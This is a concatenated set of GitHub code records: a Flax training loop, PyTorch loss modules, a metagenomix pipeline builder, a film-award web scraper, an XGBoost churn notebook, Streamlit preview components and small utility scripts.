summary_writer)\n tock = time.time()\n info = 'Epoch {} finished in {:.2f}s.'.format(epochs_id, tock - tick)\n logging.info(info)\n\n # Evaluate the model on the test set, and optionally the training set.\n tick = time.time()\n current_step = int(optimizer.state.step[0])\n if FLAGS.also_eval_on_training_set:\n train_ds = dataset_source.get_train(use_augmentations=False)\n train_metrics = eval_on_dataset(\n optimizer.target, state, train_ds, pmapped_eval_step)\n for metric_name, metric_value in train_metrics.items():\n summary_writer.scalar('eval_on_train_' + metric_name,\n metric_value, current_step)\n summary_writer.flush()\n test_ds = dataset_source.get_test()\n test_metrics = eval_on_dataset(\n optimizer.target, state, test_ds, pmapped_eval_step)\n for metric_name, metric_value in test_metrics.items():\n summary_writer.scalar('test_' + metric_name,\n metric_value, current_step)\n summary_writer.flush()\n tock = time.time()\n info = 'Evaluated model in {:.2f}.'.format(tock - tick)\n logging.info(info)\n\n # Save new checkpoint if the last one was saved more than\n # `save_progress_seconds` seconds ago.\n sec_from_last_ckpt = time.time() - time_at_last_checkpoint\n if sec_from_last_ckpt > FLAGS.save_progress_seconds:\n save_checkpoint(optimizer, state, checkpoint_dir, epochs_id)\n time_at_last_checkpoint = time.time()\n logging.info('Saved checkpoint.')\n\n # Always save final checkpoint\n save_checkpoint(optimizer, state, checkpoint_dir, epochs_id)","repo_name":"vballoli/vit-flax","sub_path":"examples/train/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":20113,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"37630583406","text":"#!/usr/bin/env python\n# coding: utf-8\n\"\"\"\nFully-connected Neural network\n\"\"\"\n\nimport torch\nfrom torch import nn\n\nfrom pyepo.func import SPOPlus, perturbedFenchelYoung\n\n\nclass reg(nn.Module):\n \"\"\"\n Linear layer model with softplus\n \"\"\"\n def __init__(self, p, m):\n super(reg, self).__init__()\n self.linear = nn.Linear(p, m*(m-1)//2)\n self.softp = nn.Softplus(threshold=5)\n\n def forward(self, x):\n h = self.linear(x)\n out = self.softp(h)\n return out\n\n\nclass fcNet(nn.Module):\n \"\"\"\n Full-connected prediction model\n \"\"\"\n def __init__(self, p, m):\n super(fcNet, self).__init__()\n # layers\n self.fc1 = nn.Linear(p, 64)\n self.relu = nn.ReLU()\n self.fc2 = nn.Linear(64, m*(m-1)//2)\n self.softp = nn.Softplus(threshold=5)\n\n def forward(self, x):\n h = self.fc1(x)\n h = self.relu(h)\n h = self.fc2(h)\n out = self.softp(h)\n return out\n\n\nclass mtlSPO(nn.Module):\n \"\"\"\n Multitask with SPO+ loss\n \"\"\"\n def __init__(self, net, solvers, processes=1, mse=False):\n super(mtlSPO, self).__init__()\n # layers\n self.net = net\n # init SPO+ loss\n self.spop = nn.ModuleList([])\n for solver in solvers:\n self.spop.append(SPOPlus(solver, processes=processes))\n # mse flag\n self.mse = mse\n self.l2 = nn.MSELoss()\n\n def forward(self, x, c, w, z):\n cp = self.net(x)\n # compute loss\n loss = []\n for i, spop in enumerate(self.spop):\n # spo+\n loss.append(spop(cp, c, w[:,i], z[:,i]).mean())\n # mse\n if self.mse:\n loss.append(self.l2(c, cp))\n return torch.stack(loss)\n\n\nclass mtlPFYL(nn.Module):\n \"\"\"\n Multitask with perturbed Fenchel-Young loss\n \"\"\"\n def __init__(self, net, solvers, n_samples=1, epsilon=1.0, processes=1):\n super(mtlPFYL, self).__init__()\n # layers\n self.net = net\n # init SPO+ loss\n self.pfyl = 
nn.ModuleList([])\n for solver in solvers:\n self.pfyl.append(perturbedFenchelYoung(solver, n_samples=n_samples, epsilon=epsilon, processes=processes))\n\n def forward(self, x, c, w, z):\n cp = self.net(x)\n # compute loss\n loss = []\n for i, pfyl in enumerate(self.pfyl):\n # spo+\n loss.append(pfyl(cp, w[:,i]).mean())\n return torch.stack(loss)\n","repo_name":"khalil-research/Multi-Task_Predict-then-Optimize","sub_path":"net/fcnet.py","file_name":"fcnet.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"10297902284","text":"# -*- coding: utf-8 -*-\n\"\"\"Project metadata\n\nIntroduction to graphical probability models by building them\n\"\"\"\n\n# The package name, which is also the \"UNIX name\" for the project.\npackage = 'intgraph'\nproject = \"Introduction to Probabilistic Graphical Models\"\nproject_no_spaces = project.replace(' ', '')\nversion = '0.1'\ndescription = 'Includes implementations for Markov Random Fields, Bayes nets, and Markov Logic Networks'\nauthors = ['Thomas Chen']\nauthors_string = ', '.join(authors)\nemails = ['foxnewsnetwork@gmail.com']\nlicense = 'MIT'\ncopyright = '2019 ' + authors_string\nurl = 'http://github.com/foxnewsnetwork/sandbox-machine/tree/master/packages/ailang'\n","repo_name":"foxnewsnetwork/sandbox-machine","sub_path":"packages/intgraph/intgraph/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35967496199","text":"import pandas as pd\n\n\ndef clean_data(df):\n \"\"\"\n\n :param df:\n :return:\n \"\"\"\n \"\"\"\n - Cleans the combined dataframe for use by ML model\n\n Args:\n df pandas_dataframe: Merged dataframe returned from load_data() function\n\n Returns:\n df pandas_dataframe: Cleaned data to be used by ML model\n \"\"\"\n\n # Split categories into separate category columns\n categories = df['categories'].str.split(\";\", \\\n expand=True)\n\n # select the first row of the categories dataframe\n row = categories.iloc[0, :].values\n\n # use this row to extract a list of new column names for categories.\n new_cols = [r[:-2] for r in row]\n\n # rename the columns of `categories`\n categories.columns = new_cols\n\n # Convert category values to just numbers 0 or 1.\n for column in categories:\n # set each value to be the last character of the string\n categories[column] = categories[column].str[-1]\n\n # convert column from string to numeric\n categories[column] = pd.to_numeric(categories[column])\n\n # drop the original categories column from `df`\n df.drop('categories', axis=1, inplace=True)\n\n # concatenate the original dataframe with the new `categories` dataframe\n df[categories.columns] = categories\n\n # drop duplicates\n df.drop_duplicates(inplace=True)\n\n return df\n","repo_name":"Brannnny/Disaster-Response-Model","sub_path":"FE/utils/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22768736820","text":"import itertools\nfrom os.path import abspath\n\nfrom metagenomix._io_utils import compute_hash\nfrom metagenomix._inputs import show_inputs\nfrom metagenomix.softwares.alignment import *\nfrom metagenomix.softwares.annotation import *\nfrom metagenomix.softwares.args import *\nfrom metagenomix.softwares.assembly import *\nfrom 
metagenomix.softwares.binning import *\nfrom metagenomix.softwares.metamarker import *\nfrom metagenomix.softwares.genomics import *\nfrom metagenomix.softwares.phlans import *\nfrom metagenomix.softwares.plasmids import *\nfrom metagenomix.softwares.pooling import pooling\nfrom metagenomix.softwares.preprocess import *\nfrom metagenomix.softwares.profiling import *\nfrom metagenomix.softwares.midas2 import *\nfrom metagenomix.softwares.simka import *\nfrom metagenomix.softwares.strains import *\nfrom metagenomix.softwares.viruses import *\nfrom metagenomix.softwares.mapping import *\nfrom metagenomix.softwares.anvio import *\nfrom metagenomix.softwares.squeezemeta import *\n\n\nclass Commands(object):\n\n def __init__(self, config, databases, workflow):\n self.config = config\n self.databases = databases\n self.graph = workflow.graph\n self.pipeline = workflow.workflow\n self.hashes = workflow.hashes\n self.softs = workflow.softs\n self.outputs = {}\n self.cmds = {}\n self.args = {}\n self.pools = {}\n self.longs = None\n self.inputs = None\n self.method = None\n self.soft = None\n self.sam_pool = None\n self.dir = ''\n self.path = []\n self.status = {}\n self.links = {}\n self.links_stats = {}\n self.holistics = {\n 'simka',\n 'quast',\n 'qiita_wol',\n 'mag_data',\n 'metamarker',\n 'woltka',\n 'drep',\n 'strainphlan',\n 'midas2_merge'\n }\n\n def collect(self):\n for sdx, (name, paths) in enumerate(self.graph.paths.items()):\n print(' [%s] %s' % (sdx, name))\n for path in paths:\n self.path = path\n hashed = self.hashes[tuple(path)]\n self.soft = self.softs[name][hashed]\n if self.config.verbose:\n print(' %s > %s' % (' ' * len(str(sdx)), hashed))\n self.get_inputs() # Update self.inputs to previous output\n self.get_dir()\n self.make_holistic()\n self.generic_command()\n self.show_messages()\n\n def get_inputs(self):\n \"\"\"Update the `inputs` attribute of the software object.\"\"\"\n if self.soft.prev == 'None':\n # if running on raw data: use the fastq files (possibly on scratch)\n self.inputs = self.config.fastq\n if self.soft.params['scratch'] and self.config.jobs:\n self.inputs = self.config.fastq_mv\n else:\n # if the previous software is not None (i.e., not on the raw data)\n prev_hash = self.hashes[tuple(self.path[:-1])]\n self.inputs = self.softs[self.soft.prev][prev_hash].outputs\n show_inputs(self)\n\n def get_dir(self):\n self.dir = abspath('%s/%s/after_%s_%s' % (\n self.config.dir, self.soft.name, self.soft.prev, self.soft.hashed))\n self.soft.dir = self.dir\n if self.soft.params['scratch'] and self.config.jobs:\n self.dir = '${SCRATCH_FOLDER}%s' % self.dir\n\n def is_pool(self):\n self.struc = list\n if set(self.inputs) == set(self.pools) or self.soft.name == 'pooling':\n self.struc = dict\n\n def make_holistic(self):\n if self.soft.name in ['abritamr', 'diting']:\n if self.soft.params['samples'] == 'all':\n self.holistics.add(self.soft.name)\n\n def generic_command(self):\n self.sam_pool = ''\n self.soft.io = {}\n if self.soft.name in self.holistics:\n self.prep_job()\n elif self.soft.name == 'pooling':\n self.pooling()\n else:\n for sam_or_pool in sorted(self.inputs):\n self.sam_pool = sam_or_pool\n self.prep_job()\n self.register_command()\n\n def show_messages(self):\n for message in self.soft.messages:\n print('[%s] %s' % (self.soft.name, message))\n\n def update_dirs(self):\n self.soft.dirs.update(set([x.replace('${SCRATCH_FOLDER}/', '/')\n for x in self.outputs['dirs']]))\n\n def init_outputs(self):\n self.outputs = {'cmds': {}, 'outs': {}, 'dirs': [], 'bash': 
[],\n 'io': {('I', 'd'): {}, ('I', 'f'): {},\n ('O', 'd'): {}, ('O', 'f'): {}}}\n\n def init_io(self, key):\n if key not in self.soft.io:\n self.soft.io[key] = {}\n\n def fill_soft_io(self):\n for i, j in itertools.product(*[['I', 'O'], ['d', 'f']]):\n for key, io in self.outputs['io'].get((i, j), {}).items():\n self.init_io((self.sam_pool, key))\n self.soft.io[(self.sam_pool, key)][(i, j)] = io\n\n def unpack_cmds(self):\n for tech, cmds in self.outputs['cmds'].items():\n self.cmds[(self.sam_pool, tech)] = cmds\n\n def unpack_outputs(self):\n if self.soft.name in self.holistics:\n self.soft.outputs = self.outputs['outs']\n else:\n outputs = dict(x for x in self.outputs['outs'].items() if x[1])\n self.soft.outputs[self.sam_pool] = outputs\n\n def extract_data(self):\n if self.outputs.get('cmds'):\n self.unpack_cmds()\n self.fill_soft_io()\n self.unpack_outputs()\n self.soft.bash = self.outputs['bash']\n\n def prep_job(self):\n self.init_outputs() # initialize data structure collection\n self.call_method() # collect commands, outputs, io, dirs\n self.extract_data() # fill the useful self.soft attributes\n self.update_dirs()\n\n def pooling(self):\n for pool in self.config.pooling_groups:\n self.pools[pool] = {}\n self.soft.outputs[pool] = {}\n pooling(self, pool)\n\n def call_method(self):\n \"\"\"Call the command-preparing method from this class (for the\n softwares that are easy to deal with), or from auxillary modules\n located in the softwares submodules path.\"\"\"\n names = self.soft.name.split('_')\n name = names[0]\n if name in globals():\n globals()[name](self)\n else:\n raise ValueError('No method for software \"%s\"' % self.soft.name)\n\n def register_command(self):\n self.softs[self.soft.name][self.soft.hashed].cmds = dict(self.cmds)\n self.cmds = {}\n","repo_name":"FranckLejzerowicz/metagenomix","sub_path":"metagenomix/core/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"10106328408","text":"import re\nimport requests\nimport unicodedata\nfrom abc import abstractmethod\nfrom bs4 import BeautifulSoup\nfrom nay.decorators import sort_by\nfrom nay.scraper import Scraper, Scrapable\n\n\nclass PrizeSet:\n def __init__(self):\n self._scraper = Scraper()\n\n @sort_by(lambda ds: (ds['year'], ds['name']))\n def data_set(self):\n # FIXME: Dangerous iterating over dynamic subclasses\n # TODO: ds structure is different from the original\n # See other_nominate_data.json\n self._prefetch()\n\n for cls in Prize.__subclasses__():\n yield from cls().data_set()\n\n def _prefetch(self):\n objects = [cls() for cls in Prize.__subclasses__()]\n self._scraper.get(objects)\n\n\nclass Prize(Scrapable):\n def __init__(self):\n self._content = None\n\n @abstractmethod\n def data_set(self):\n pass\n\n @property\n def name(self):\n name = type(self).__name__\n return re.sub(r'(?!^)([A-Z]+)', r'_\\1', name).lower()\n\n @property\n def content(self):\n if self._content:\n return self._content\n\n page = requests.get(self.url)\n self.set_content(page.content)\n return self._content\n\n @property\n def soup(self):\n return BeautifulSoup(self.content, 'lxml')\n\n def set_content(self, content):\n self._content = content\n\n @staticmethod\n def _uni_nfkc(text):\n return unicodedata.normalize('NFKC', text)\n\n\nclass NikkanSports(Prize):\n @property\n def url(self):\n return \"https://www.nikkansports.com/entertainment/award/ns-cinema/history/\" # noqa: E501\n\n 
@sort_by(lambda ds: ds['year'], uniq=True)\n def data_set(self):\n for table in self.soup.select('table.nsTable'):\n year_text = self._uni_nfkc(table.select_one('caption').text)\n title_text = self._uni_nfkc(table.select_one('tr > td').text)\n\n match = re.match(r'第\\d+回\\((\\d{4})年\\)', year_text)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': title_text,\n }\n\n\nclass GoldenGross(Prize):\n @property\n def url(self):\n return \"https://ja.wikipedia.org/wiki/ゴールデングロス賞\"\n\n @sort_by(lambda ds: ds['year'])\n def data_set(self):\n for tr in self.soup.select('table.wikitable > tbody > tr'):\n year_elm = tr.select_one('td:nth-child(1) > a')\n if not year_elm:\n continue\n\n title_elm = tr.select_one('td:nth-child(3) > a')\n if not title_elm:\n continue\n\n year_text = self._uni_nfkc(year_elm.text)\n title_text = self._uni_nfkc(title_elm.text)\n\n match = re.match(r'(\\d{4})年', year_text)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': title_text,\n }\n\n\nclass HochiEigashou(Prize):\n @property\n def url(self):\n return \"https://www.hochi.co.jp/award/hochi_eigashou/history.html\"\n\n @sort_by(lambda ds: ds['year'], uniq=True)\n def data_set(self):\n for tr in self.soup.select('table.btable > tr'):\n year_elm = tr.select_one('td:nth-child(2)')\n if not year_elm:\n continue\n\n title_elm = tr.select_one('td:nth-child(3)')\n if not title_elm:\n continue\n\n yield {\n 'name': self.name,\n 'year': int(self._uni_nfkc(year_elm.text)),\n 'title': self._uni_nfkc(title_elm.text),\n }\n\n # XXX: has not yet been uploaded\n yield {\n 'name': self.name,\n 'year': 2018,\n 'title': '孤狼の血',\n }\n\n\nclass MainichiFilmAward(Prize):\n @property\n def url(self):\n return \"https://mainichi.jp/mfa/history/\"\n\n @sort_by(lambda ds: ds['year'])\n def data_set(self):\n for li in self.soup.select(\"ul.list-history > li\"):\n line = self._uni_nfkc(li.select_one('a').text)\n\n match = re.match(r'(\\d{4})年\\(第\\d+回\\)『(.*)』', line)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': match.group(2),\n }\n\n\nclass BlueRibbonAward(Prize):\n @property\n def url(self):\n return \"https://mihocinema.com/blueribbon-list\"\n\n @sort_by(lambda ds: ds['year'])\n def data_set(self):\n for tr in self.soup.select('table tr'):\n year_elm = tr.select_one('td:nth-child(2)')\n if not year_elm:\n continue\n\n title_elm = tr.select_one('td:nth-child(3)')\n if not title_elm:\n continue\n\n year_text = self._uni_nfkc(year_elm.text)\n title_text = self._uni_nfkc(title_elm.text)\n\n match = re.match(r'(\\d{4})年', year_text)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': title_text,\n }\n\n\nclass KinejunBestTen(Prize):\n @property\n def url(self):\n return \"http://www.kinenote.com/main/award/kinejun/\"\n\n @sort_by(lambda ds: ds['year'])\n def data_set(self):\n for tr in self.soup.select('table.tbl_year > tr'):\n year_elm = tr.select_one('td:nth-child(1) > a')\n if not year_elm:\n continue\n\n title_elm = tr.select_one('td:nth-child(3) > a')\n if not title_elm:\n continue\n\n year_text = self._uni_nfkc(year_elm.text)\n title_text = self._uni_nfkc(title_elm.text)\n\n match = re.match(r'(\\d{4})年', year_text)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': title_text,\n 
}\n","repo_name":"kondounagi/japanese_movies_dataset","sub_path":"src/nay/prize.py","file_name":"prize.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"71824841106","text":"# Refazendo o exe051 - Progressão Aritmética\nimport time\nprint('='*10,'Progressão Aritmética v2.0','='*10)\np_termo = int(input('\\nDigite o primeiro termo dessa PA: '))\nrazao = int(input('Digite a razão dessa PA: '))\ndecimo = p_termo\nx = 1\n\nprint(f'\\nOs dez primeiros termos dessa PA são: {p_termo}',end=' ')\n\nwhile x < 10:\n    p_termo = decimo + razao\n    decimo = p_termo\n    x += 1\n    time.sleep(0.5)\n    print(decimo,end=' ')\n\nmais_termos = str(input('\\nVocê quer ver mais termos dessa PA ? [s/n] ')).lower()\n\nwhile mais_termos != 's' and mais_termos != 'n':\n    mais_termos = str(input('\\nVocê quer ver mais termos dessa PA ? [s/n] ')).lower()\n\nif mais_termos == 's':\n    mais_termos = int(input('\\nDigite quantos termos a mais quer ver: '))\n    x = 0\n    while x < mais_termos:\n        p_termo = decimo + razao\n        decimo = p_termo\n        print(decimo,end=' ')\n        time.sleep(0.5)\n        x += 1\n","repo_name":"gabrielcosmo/cursoemvideo.curso.python3","sub_path":"Mundo2/exe062.py","file_name":"exe062.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"20132660641","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[28]:\n\n\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[29]:\n\n\ndataframe = pd.read_csv(\"C:/Users/rishu/OneDrive/Desktop/project/Rusali/Fraudulent-Customer-Detection-in-Banks-Rishi/Churn_Modelling.csv\")\n\n\n# In[30]:\n\n\ndataframe.head()\n\n\n# In[31]:\n\n\ndataframe.columns\n\n\n# In[32]:\n\n\ndataframe.index\n\n\n# In[33]:\n\n\ndataframe.info()\n\n\n# In[34]:\n\n\nX = dataframe.iloc[:, 3:13].values\n\n\n# In[35]:\n\n\nY = dataframe.iloc[:, -1].values\n\n\n# In[36]:\n\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n\n\n# In[37]:\n\n\nlabelE_X1 = LabelEncoder()\nX[:,1] = labelE_X1.fit_transform(X[:,1])\n\n\n# In[38]:\n\n\nlabelE_X2 = LabelEncoder()\nX[:,2] = labelE_X2.fit_transform(X[:,2])\n\n\n# In[39]:\n\n\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\nct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [1])], remainder='passthrough')\nX = np.array(ct.fit_transform(X))\n\n\n# In[40]:\n\n\nX = X[:,1:]\n\n\n# In[41]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, random_state = 40)\n\n\n# In[42]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[43]:\n\n\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\n# transform only: the scaler must be fit on the training data alone\nX_test = sc.transform(X_test)\n\n\n# In[44]:\n\n\nimport xgboost\n\n\n# In[45]:\n\n\nmodel = xgboost.XGBClassifier(random_state=40)\n\n\n# In[46]:\n\n\nmodel.fit(X_train,Y_train)\n\n\n# In[47]:\n\n\ny_pred = model.predict(X_test)\n\n\n# In[48]:\n\n\ny_pred\n\n\n# In[49]:\n\n\nfrom sklearn.metrics import accuracy_score\n\n\n# In[50]:\n\n\naccuracy_score(Y_test, y_pred)\n\n\n# ### Parameter Tuning for XGBoost\n\n# In[54]:\n\n\nparameters = {\n    \"max_depth\": [3, 4, 5, 6, 8, 10, 12, 15],\n    \"learning_rate\": [0.5, 0.10, 0.15, 0.20, 0.25, 0.30],\n    \"min_child_weight\": [1, 3, 5, 7],\n    \"gamma\": [0.0, 0.1, 0.2, 0.3, 0.4],\n    
\"colsample_bytree\": [0.3, 0.4, 0.5, 0.7]\n}\n\n\n# In[55]:\n\n\nfrom sklearn.model_selection import RandomizedSearchCV\n\n\n# In[56]:\n\n\nrcv = RandomizedSearchCV(model, param_distributions=parameters,n_iter=5,scoring=\"roc_auc\", n_jobs=1, cv=5, verbose=3)\n\n\n# In[58]:\n\n\nrcv.fit(X_train,Y_train)\n\n\n# In[59]:\n\n\nrcv.best_params_\n\n\n# In[66]:\n\n\nmodel_new = xgboost.XGBClassifier(min_child_weight=1,max_depth=5,learning_rate=0.1,gamma=0.4,colsample_bytree=0.5)\n\n\n# In[67]:\n\n\nmodel_new.fit(X_train,Y_train)\n\n\n# In[68]:\n\n\ny_pred_new = model_new.predict(X_test)\n\n\n# In[69]:\n\n\ny_pred_new\n\n\n# In[70]:\n\n\naccuracy_score(Y_test, y_pred_new)\n\n","repo_name":"Rusali28/Fraudulent-Customer-Detection-in-Banks","sub_path":"Fraudulent-Customer-Detection-in-Banks-Rishi/Fraudulent_Customer_Detection_XGBoost.py","file_name":"Fraudulent_Customer_Detection_XGBoost.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6796030549","text":"# -*- coding: utf-8 -*-\nimport uuid\nfrom abc import abstractmethod\nfrom typing import TYPE_CHECKING, List, Mapping, Union\n\nfrom pydantic import Field\n\nfrom kiara.api import Value, ValueMap\nfrom kiara_plugin.streamlit.components import ComponentOptions, KiaraComponent\nfrom kiara_plugin.streamlit.components.models import (\n create_recursive_table_from_model_object,\n)\nfrom kiara_plugin.streamlit.utils.components import create_list_component\n\nif TYPE_CHECKING:\n from kiara_plugin.streamlit.api import KiaraStreamlitAPI\n\n\nclass PreviewOptions(ComponentOptions):\n\n show_properties: bool = Field(\n description=\"Whether to show the properties of the value.\", default=True\n )\n height: Union[int, None] = Field(\n description=\"The height of the preview.\", default=None\n )\n display_style: str = Field(\n description=\"The display style to use for this preview.\", default=\"default\"\n )\n value: Union[str, uuid.UUID, Value] = Field(description=\"The value to preview.\")\n\n\nclass PreviewComponent(KiaraComponent[PreviewOptions]):\n\n _options = PreviewOptions # type: ignore\n\n @classmethod\n @abstractmethod\n def get_data_type(cls) -> str:\n pass\n\n @classmethod\n def get_preview_name(cls) -> str:\n return \"default\"\n\n @abstractmethod\n def render_preview(self, st: \"KiaraStreamlitAPI\", options: PreviewOptions):\n pass\n\n def _render(\n self,\n st: \"KiaraStreamlitAPI\",\n options: PreviewOptions,\n ):\n\n self.render_preview(st=st, options=options)\n\n\nclass PropertiesViewOptions(ComponentOptions):\n \"\"\"Options for the properties view component.\"\"\"\n\n value: Union[str, uuid.UUID, Value] = Field(description=\"The value to preview.\")\n\n\nclass PropertiesViewComponent(KiaraComponent[PropertiesViewOptions]):\n \"\"\"Display the properties of a value.\"\"\"\n\n _component_name = \"display_value_properties\"\n _options = PropertiesViewOptions\n\n def _render(self, st: \"KiaraStreamlitAPI\", options: PropertiesViewOptions):\n\n value = self.api.get_value(value=options.value)\n\n for prop_name, prop_value in value.property_values.items():\n _prop_name = prop_name.replace(\"metadata.\", \"\")\n st.write(f\"Metadata item: **{_prop_name}**\")\n\n table_data = create_recursive_table_from_model_object(prop_value.data)\n name_col, val_col = st.columns([1, 3])\n\n for key, value in table_data.items():\n\n with name_col:\n name_col.write(key)\n\n with val_col:\n if isinstance(value, (Mapping, List)):\n val_col.json(value, 
expanded=False)\n else:\n val_col.write(value)\n\n\nclass DefaultPreviewComponent(PreviewComponent):\n \"\"\"The default preview component, will render a preview component dependent on the data type of the provided value.\"\"\"\n\n _component_name = \"preview\"\n _examples = [\n {\"doc\": \"Preview a table value.\", \"args\": {\"value\": \"nodes_table\"}},\n ]\n\n @classmethod\n def get_data_type(cls) -> str:\n return \"any\"\n\n def render_preview(\n self,\n st: \"KiaraStreamlitAPI\",\n options: PreviewOptions,\n ):\n\n preview_name = options.display_style\n height = options.height\n if not height:\n height = 400\n\n _value = self.api.get_value(options.value)\n if not _value.is_set:\n st.write(\"Value not set.\")\n return\n\n component = self._kiara_streamlit.get_preview_component(\n data_type=_value.data_type_name, preview_name=preview_name\n )\n if component is not None:\n component.render_func(st)(value=_value, key=options.create_key(\"preview\"))\n else:\n if isinstance(options.value, Value):\n name = str(_value.value_id)\n else:\n name = str(options.value)\n\n renderable = self.api.render_value(\n value=_value, target_format=\"string\", use_pretty_print=True\n )\n st.text_area(\n f\"Value: {name}\",\n value=renderable,\n disabled=True,\n height=height,\n key=options.create_key(\"preview\", \"default\"),\n )\n\n\nclass PreviewListOptions(ComponentOptions):\n\n data_types: Union[str, List[str], None] = Field(\n description=\"The data types to display.\", default=None\n )\n\n\nclass ValueList(KiaraComponent[PreviewListOptions]):\n\n _component_name = \"value_list\"\n _options = PreviewListOptions\n\n def _render(\n self, st: \"KiaraStreamlitAPI\", options: PreviewListOptions\n ) -> Union[str, None]:\n\n data_types = []\n if options.data_types:\n if isinstance(options.data_types, str):\n data_types.append(options.data_types)\n else:\n data_types.extend(options.data_types)\n\n values = self.api.list_aliases(data_types=data_types)\n\n _key = options.create_key(\"value_list\")\n selected_alias = create_list_component(\n st=st, key=_key, title=\"Values\", items=list(values.keys())\n )\n\n return selected_alias\n\n\nclass ValueListPreview(KiaraComponent[PreviewListOptions]):\n\n _component_name = \"value_list_preview\"\n _options = PreviewListOptions\n\n def _render(\n self,\n st: \"KiaraStreamlitAPI\",\n options: PreviewListOptions,\n ) -> Union[str, None]:\n ratio_preview: int = 3\n data_list_column, preview_column = st.columns([1, ratio_preview])\n\n _key = options.create_key(\"data_list\")\n\n comp = self.get_component(\"value_list\")\n selected_alias = comp.render_func(data_list_column)(\n key=_key, data_types=options.data_types\n )\n\n if selected_alias:\n value = self.api.get_value(selected_alias)\n component = self.kiara_streamlit.get_preview_component(value.data_type_name)\n\n if component is None:\n component = self.kiara_streamlit.get_preview_component(\"any\")\n\n pr_opts = PreviewOptions(key=options.create_key(\"preview\"), value=value)\n component.render_preview(preview_column, options=pr_opts) # type: ignore\n\n return selected_alias\n\n\nclass ValueMapPreviewOptions(ComponentOptions):\n\n add_value_types: bool = Field(\n description=\"Whether to add the type of the value to the tab titles.\",\n default=True,\n )\n add_save_option: bool = Field(\n description=\"Whether to add a save option for every value.\", default=False\n )\n value_map: Mapping[str, Union[str, uuid.UUID, Value]] = Field(\n description=\"The values to display.\"\n )\n\n\nclass 
ValueMapPreview(KiaraComponent[ValueMapPreviewOptions]):\n\n _component_name = \"value_map_preview\"\n _options = ValueMapPreviewOptions\n\n def _render(\n self,\n st: \"KiaraStreamlitAPI\",\n options: ValueMapPreviewOptions,\n ) -> Union[ValueMap, None]:\n\n if not options.value_map:\n st.write(\"-- no values --\")\n return None\n\n _values = self.api.assemble_value_map(options.value_map)\n\n field_names = sorted(_values.keys())\n if not options.add_value_types:\n tab_names = field_names\n else:\n tab_names = sorted(\n (f\"{x} ({_values[x].data_type_name})\" for x in _values.keys())\n )\n\n tabs = st.tabs(tab_names)\n for idx, field in enumerate(field_names):\n\n value = _values[field]\n if not value.is_set:\n tabs[idx].markdown(\"-- value not set --\")\n else:\n component = self.kiara_streamlit.get_preview_component(\n value.data_type_name\n )\n if component is None:\n component = self.kiara_streamlit.get_preview_component(\"any\")\n\n if options.add_save_option:\n center, right = tabs[idx].columns([4, 1])\n else:\n center = tabs[idx]\n right = None\n\n _key = options.create_key(\"preview\", f\"{idx}_{field}\")\n preview_opts = PreviewOptions(key=_key, value=value)\n component.render_preview(st=center, options=preview_opts) # type: ignore\n\n if options.add_save_option:\n assert right is not None\n right.write(\"Save value\")\n with right.form(\n key=options.create_key(\"save_form\", f\"{idx}_{field}\")\n ):\n _key = options.create_key(\"alias\", f\"{idx}_{field}\")\n alias = self._st.text_input(\n \"alias\",\n value=\"\",\n key=_key,\n placeholder=\"alias\",\n label_visibility=\"hidden\",\n )\n # _key = options.create_key(\"save\", f\"{idx}_{field}\")\n save = self._st.form_submit_button(\"Save\")\n\n if save and alias:\n store_result = self.api.store_value(\n value=value, alias=alias, allow_overwrite=False\n )\n if store_result.error:\n right.error(store_result.error)\n else:\n right.success(\"Value saved\")\n st.experimental_rerun()\n\n return _values\n","repo_name":"DHARPA-Project/kiara_plugin.streamlit","sub_path":"src/kiara_plugin/streamlit/components/preview/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13354834345","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# taken from our isolinux gfxboot configuration\n# gfxboot-theme-kogaion.git/langnames.inc\nlangs = [\n [ \"en\", \"en_US\", \"English\" ],\n [ \"ro\", \"ro_RO\", \"Română\" ],\n]\n\nkeymaps = [\n [ \"af\", \"Afghanistan\"],\n [ \"al\", \"Albania\"],\n [ \"ad\", \"Andorra\"],\n [ \"ara\", \"Arabic\"],\n [ \"am\", \"Armenia\"],\n [ \"es_ast\", \"Asturian\"],\n [ \"az\", \"Azerbaijan\"],\n [ \"bd\", \"Bangladesh\"],\n [ 